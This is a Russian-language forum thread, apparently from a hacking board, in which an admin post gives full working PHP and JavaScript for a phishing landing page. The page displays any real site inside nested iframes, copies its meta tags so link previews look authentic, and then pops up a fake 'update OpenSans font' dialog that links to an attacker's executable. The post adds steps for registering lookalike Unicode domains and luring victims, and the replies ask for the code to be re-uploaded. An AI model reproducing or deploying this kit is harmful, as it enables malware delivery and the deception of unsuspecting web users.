Замашка на универсальный лендинг для выдачи EXE

[Admin]

Идея заключается в более-менее универсальном способе точечного впаривания exe (а возможно и не только) целевой аудитории
Я думаю только ленивый не слышал о нашумевшей не так давно кампании Hoefler Text, когда на шеллы заливался лендинг-имплант предлагавший "установить шрифт"

Сегодня мы попытаемся повторить что-то эдакое, только без необходимости ломать целевой ресурс - мы постараемся его универсально подделать.

Для начала, создадим незамысловатую структуру файлов (тут и далее будем писать на РНР и немного JS):

В style.css внесем самые обычные стили

html,body{
height:100%;
overflow:hidden;
}
*{
margin:0px;
padding:0px;
}
iframe{
height:100%;
width: 100%;
border:none;
}

Вся задумка заключается в том, что для отображения контента мы не будем парсить и проксировать сайт-донор, а отобразим его во фрейме на стороне клиента (так мы убережемся и от неправильного парсинга, например из-за прокладок и DDOS-защит и самое главное сохраним куки пользователя - если он авторизован на сайте-доноре он увидит все свои привычные настройки и свою сессию). Фрейм бы будем вкладывать в еще один фрейм (для обхода сайтов которые проверяют window.opener и window.top), дабы избежать "выхода" донора из фрейма

Итого, нам нужно :

1) Показать во фрейме на весь экран оригинальный ресурс (любую его страницу)
2) Подождать пару секунд (дать пользователю сконцентрировать на ней внимание)
3) Отобразить модальное окошко с предложением скачать и установить шрифт

Забегая наперед, для одной из страниц сайта coindesk выглядеть это будет вот так :

Итак, сказано - сделано. Приступим к простому коду нашей системы :

В файл index.php внесем такой код :

<?php
$origUrl = base64_decode(urldecode($_GET['u']));
$pageSource = file_get_contents("http://".$origUrl);

$pageSource = preg_replace("/<body(.+)<.body>/sim", " ",$pageSource);
$pageSource = str_replace(".js", ".404js",$pageSource);
$pageSource = str_replace(".css", ".404css",$pageSource);



?>

<?php

echo $pageSource;

?>
<body>
   <link rel="stylesheet" href="style.css"/>
<iframe src="frame.php?u=<?= $_GET["u"] ?>" scroll="no"></iframe>   
</body>
</html>

Здесь мы сначала декодируем параметр (целевую страницу) который пришел нам в GET, затем пытаемся забрать ее http-тело, из которого в последствии вырежем содержимое тега <BODY>
Делается это для того, что бы забрать содержимое HEAD (которое мы включаем в страницу) и подменить во-первых заголовок страницы, а во-вторых подменить очень важные для нас metarg параметры


Видели как социальные сети и мессенджеры на лету генерят превьюхи для новостников? Сфейканая таким образом страница будет выглядеть на превью абсолютно идентично, благодаря забору этих аттрибутов

Тот же зафейканый coindesk :

Осталось сделать саму модалку - использовать будем встроенную в bootstrap. Ниже приведен код frame.php

<?php
$origUrl = base64_decode(urldecode($_GET['u']));
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://v4-alpha.getbootstrap.com/dist/css/bootstrap.min.css" type="text/css" />
<script src="//code.jquery.com/jquery-latest.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.3/js/tether.min.js"></script>
<script src="https://v4-alpha.getbootstrap.com/dist/js/bootstrap.min.js"></script>

</head>
<body>
<div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
 <div class="modal-dialog" role="document">
   <div class="modal-content">
     <div class="modal-header">
       <h5 class="modal-title" id="exampleModalLabel"><img src="http://tech-files.com/wp-content/uploads/2017/09/chrome_1-664x374.jpg" height="80px" /></h5>
       </button>
     </div>
     <div class="modal-body">
       <div class="container-fluid">
       <div class="col-xs-8">
       This webpage requires updated version of <b>OpenSans</b> font<br/>
       Please, install it by clicking <a href="http://your-super-site.com/file.exe">here</a>
       </div>
       </div>
     </div>
   </div>
 </div>
</div>
<iframe src="//<?= $origUrl ?>"></iframe>   

<script>
$(document).ready(function(){

setTimeout(function(){
 $("#myModal").modal();
},1300);

})
</script>
</body>
</html>

Соотвественно для работы, линк http://your-super-site.com/file.exe нужно будет заменить на свой exe doc zip cab а текст разводки отредактировать под себя.

Обобщая, рецепт успеха таков :

1. Кодируем нужный url в base64 БЕЗ http, например coindesk.com/topped-out-bitcoin-flirts-with-short-term-bearish-reversal/ превратится в Y29pbmRlc2suY29tL3RvcHBlZC1vdXQtYml0Y29pbi1mbGlydHMtd2l0aC1zaG9ydC10ZXJtLWJlYXJp
c2gtcmV2ZXJzYWwv. Кодировать можно например на base64.ru
2. Заливаем фейк на домен (конечно берем максимально похожий, например с кириллицей или иным юникодом)
3. Шем пользователя на страницу your-fake-domain.com/index.php?u=YOUR_BASE64_HERE
4. ???
5. PROFIT!!!

Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :
https://www.sendspace.com/file/yg9bqq
Всех с наступающим!

 

[naxaji]

прикольная тема ребят а вот делал в углу висит како-то квадрат как его вообще убрать а то не красиво получается знаний нет вообще в этом...

 

[lamer2018g]

Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :
https://www.sendspace.com/file/yg9bqq
Всех с наступающим!

А можно перезалить ?
С ув.

 

[Bereza]

А можно перезалить ?
С ув.

Уважаемый! А что тебе нужно перезалить? Первое сообщение?